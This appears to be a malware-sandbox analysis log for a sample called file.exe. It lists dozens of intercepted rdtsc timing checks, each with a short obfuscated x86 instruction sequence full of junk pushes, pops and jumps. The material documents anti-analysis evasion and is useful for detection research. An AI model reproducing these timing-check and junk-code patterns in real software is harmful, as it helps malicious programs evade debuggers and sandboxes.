Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FA7072 second address: FA7085 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 jp 00007F9D4900D0CCh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FA7085 second address: FA709A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F9D493C17D0h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FA709A second address: FA70D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F9D4900D0CFh 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d jng 00007F9D4900D0DFh 0x00000013 push eax 0x00000014 push edx 0x00000015 push edx 0x00000016 pop edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FA70D4 second address: FA70D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F54903 second address: F5491C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D4900D0D5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FA748A second address: FA74C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D493C17D0h 0x00000007 jns 00007F9D493C17C6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007F9D493C17D9h 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FA74C1 second address: FA74C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FA74C5 second address: FA74C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FA7ED5 second address: FA7EEA instructions: 0x00000000 rdtsc 0x00000002 jns 00007F9D4900D0C8h 0x00000008 pushad 0x00000009 push edx 0x0000000a pop edx 0x0000000b jg 00007F9D4900D0C6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FAE601 second address: FAE60F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F9D493C17C6h 0x0000000a pop esi 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FAE920 second address: FAE929 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FAE929 second address: FAE92D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FAE92D second address: FAE931 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FAE931 second address: FAE937 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FAE937 second address: FAE93D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FAE93D second address: FAE947 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F9D493C17C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FAE947 second address: FAE955 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push edx 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FAE955 second address: FAE95B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FAEC67 second address: FAEC79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F9D4900D0CEh 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FAEC79 second address: FAECC5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 jmp 00007F9D493C17D8h 0x0000000c popad 0x0000000d pushad 0x0000000e jbe 00007F9D493C17C6h 0x00000014 jmp 00007F9D493C17D3h 0x00000019 push edi 0x0000001a pop edi 0x0000001b jnc 00007F9D493C17C6h 0x00000021 popad 0x00000022 pop edx 0x00000023 pop eax 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 pushad 0x00000028 popad 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FAECC5 second address: FAECD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 jc 00007F9D4900D0C6h 0x0000000c jo 00007F9D4900D0C6h 0x00000012 pop ebx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FAF257 second address: FAF272 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D493C17D7h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FAF272 second address: FAF278 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FAF278 second address: FAF291 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F9D493C17CFh 0x00000008 pushad 0x00000009 popad 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FAF291 second address: FAF295 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FAF295 second address: FAF2A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FAF2A4 second address: FAF2C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9D4900D0D4h 0x00000009 pop edx 0x0000000a jnc 00007F9D4900D0CAh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FAF2C7 second address: FAF2DC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F9D493C17CEh 0x00000008 pop edx 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FAF5A7 second address: FAF5AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FAF5AB second address: FAF5C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F9D493C17CBh 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FAF5C0 second address: FAF5C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FAF5C6 second address: FAF5DE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 jbe 00007F9D493C17D4h 0x0000000f pushad 0x00000010 jnl 00007F9D493C17C6h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FAF86D second address: FAF88C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9D4900D0D5h 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FAF88C second address: FAF892 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FAF892 second address: FAF896 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FAF896 second address: FAF8BA instructions: 0x00000000 rdtsc 0x00000002 jns 00007F9D493C17C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F9D493C17D2h 0x00000011 je 00007F9D493C17C6h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FAF8BA second address: FAF8BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FAFB5C second address: FAFB61 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FAFB61 second address: FAFB69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FAFB69 second address: FAFB74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push edi 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FAFB74 second address: FAFB7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB0125 second address: FB012F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB012F second address: FB0133 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB0133 second address: FB016A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F9D493C17D0h 0x0000000b jmp 00007F9D493C17CDh 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 jne 00007F9D493C17C6h 0x0000001c pop edx 0x0000001d pushad 0x0000001e push edi 0x0000001f pop edi 0x00000020 push eax 0x00000021 pop eax 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB016A second address: FB016F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC1EE1 second address: FC1F09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 jns 00007F9D493C17C6h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F9D493C17D1h 0x00000016 jnl 00007F9D493C17C6h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC1F09 second address: FC1F13 instructions: 0x00000000 rdtsc 0x00000002 js 00007F9D4900D0C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC1F13 second address: FC1F40 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F9D493C17D4h 0x00000008 jmp 00007F9D493C17CEh 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F9D493C17D3h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC1F40 second address: FC1F44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC1F44 second address: FC1F61 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F9D493C17D0h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC1F61 second address: FC1F65 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC0121 second address: FC0125 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC0125 second address: FC0130 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007F9D4900D0C6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC0130 second address: FC0150 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push ecx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F9D493C17CFh 0x0000000f pop ecx 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push ebx 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC0150 second address: FC0161 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push esi 0x00000007 pop esi 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jnl 00007F9D4900D0C6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC0448 second address: FC044C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC044C second address: FC046A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F9D4900D0D3h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC046A second address: FC0478 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F9D493C17C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC0478 second address: FC0488 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9D4900D0CCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC0488 second address: FC0498 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F9D493C17C6h 0x00000008 ja 00007F9D493C17C6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC05FC second address: FC0608 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC0608 second address: FC0613 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC0788 second address: FC078E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC078E second address: FC0792 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC090A second address: FC0936 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9D4900D0D7h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F9D4900D0CEh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC0936 second address: FC093E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC0D66 second address: FC0D6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC0EE5 second address: FC0EF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F9D493C17C6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC51AA second address: FC51B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC51B7 second address: FC51BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC51BB second address: FC51E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jmp 00007F9D4900D0CBh 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F9D4900D0D4h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC51E5 second address: FC51E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FCA7B4 second address: FCA7DC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F9D4900D0CEh 0x00000008 pop ecx 0x00000009 push ebx 0x0000000a js 00007F9D4900D0C6h 0x00000010 pushad 0x00000011 popad 0x00000012 pop ebx 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 jnp 00007F9D4900D0C8h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FCDB4E second address: FCDB52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FCD605 second address: FCD609 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FCD74C second address: FCD751 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FDDACE second address: FDDAEB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F9D4900D0D2h 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FE1E70 second address: FE1E7A instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F9D493C17C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FE1E7A second address: FE1E86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F9D4900D0C6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FE1E86 second address: FE1E8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FE1E8A second address: FE1E8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FE185F second address: FE187B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9D493C17D6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FE187B second address: FE1887 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pushad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FE1887 second address: FE1894 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FE1894 second address: FE1898 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FE6655 second address: FE665F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F9D493C17C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FED4BC second address: FED4C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FED4C0 second address: FED4F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F9D493C17D9h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F9D493C17D2h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FED4F3 second address: FED530 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D4900D0D0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F9D4900D0D5h 0x00000010 jmp 00007F9D4900D0D2h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF2653 second address: FF2666 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9D493C17CFh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF2666 second address: FF266A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF8EA1 second address: FF8EA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F06E47 second address: F06E4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop ecx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF817E second address: FF8185 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF8185 second address: FF81AB instructions: 0x00000000 rdtsc 0x00000002 jng 00007F9D4900D0CEh 0x00000008 pushad 0x00000009 popad 0x0000000a jl 00007F9D4900D0C6h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 je 00007F9D4900D0E4h 0x00000018 push eax 0x00000019 push edx 0x0000001a jnp 00007F9D4900D0C6h 0x00000020 jne 00007F9D4900D0C6h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF8C0E second address: FF8C23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F9D493C17C6h 0x0000000a popad 0x0000000b jmp 00007F9D493C17CAh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFCE99 second address: FFCEA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop edi 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFCEA6 second address: FFCEBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9D493C17D3h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 101A4DF second address: 101A504 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F9D4900D0C8h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F9D4900D0D3h 0x00000011 jg 00007F9D4900D0C6h 0x00000017 rdtsc
